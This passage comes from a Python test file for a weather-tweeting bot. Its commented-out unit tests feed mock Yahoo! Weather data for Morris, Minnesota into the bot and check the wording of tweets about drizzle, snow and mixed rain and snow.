/>\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '8', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '33', 'text': 'Fair'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'km/h', 'temperature': 'C', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-33', 'direction': '310', 'speed': '56'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data_c = weatherBot.get_weather_variables(ydata_c)
# self.assertEqual(weatherBot.make_special_tweet(weather_data_c),
# 'Hold onto your hats, the wind is blowing at 56 km/h coming from the NW.')
#
# def test_make_special_tweet_drizzle(self):
# """Testing if drizzle event is triggered"""
# ydata1 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '8', 'text': 'Fair'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-26', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data1 = weatherBot.get_weather_variables(ydata1)
# self.assertEqual(weatherBot.make_special_tweet(weather_data1), 'Drizzlin\' yo.')
# ydata2 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '8', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '9', 'text': 'Fair'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'km/h', 'temperature': 'C', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-33', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data2 = weatherBot.get_weather_variables(ydata2)
# self.assertEqual(weatherBot.make_special_tweet(weather_data2), 'Drizzlin\' yo.')
#
# def test_make_special_tweet_snow(self):
# """Testing if snow event is triggered"""
# ydata1 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '13', 'text': 'Snow Flurries'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-26', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data1 = weatherBot.get_weather_variables(ydata1)
# self.assertEqual(weatherBot.make_special_tweet(weather_data1), 'Snow flurries. Bundle up.')
# ydata2 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '8', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '14', 'text': 'Light Snow Showers'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'km/h', 'temperature': 'C', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-33', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data2 = weatherBot.get_weather_variables(ydata2)
# self.assertEqual(weatherBot.make_special_tweet(weather_data2), 'Light snow showers. Bundle up.')
# ydata3 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '15', 'text': 'Blowing Snow'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-26', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data3 = weatherBot.get_weather_variables(ydata3)
# self.assertEqual(weatherBot.make_special_tweet(weather_data3), 'Blowing snow. Bundle up.')
# ydata4 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '8', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '16', 'text': 'Snow'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'km/h', 'temperature': 'C', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-33', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data4 = weatherBot.get_weather_variables(ydata4)
# self.assertEqual(weatherBot.make_special_tweet(weather_data4), 'Snow. Bundle up.')
# ydata5 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '41', 'text': 'Heavy Snow'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-26', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data5 = weatherBot.get_weather_variables(ydata5)
# self.assertEqual(weatherBot.make_special_tweet(weather_data5), 'Heavy snow. Bundle up.')
# ydata6 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '8', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '43', 'text': 'Heavy Snow'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'km/h', 'temperature': 'C', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-33', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data6 = weatherBot.get_weather_variables(ydata6)
# self.assertEqual(weatherBot.make_special_tweet(weather_data6), 'Heavy snow. Bundle up.')
#
# def test_make_special_tweet_mixes(self):
# """Testing if mixes event is triggered"""
# ydata1 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '5', 'text': 'Mixed Rain and Snow'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-26', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data1 = weatherBot.get_weather_variables(ydata1)
# self.assertEqual(weatherBot.make_special_tweet(weather_data1),
# 'What a mix! Currently, there\'s mixed rain and snow falling from the sky.')
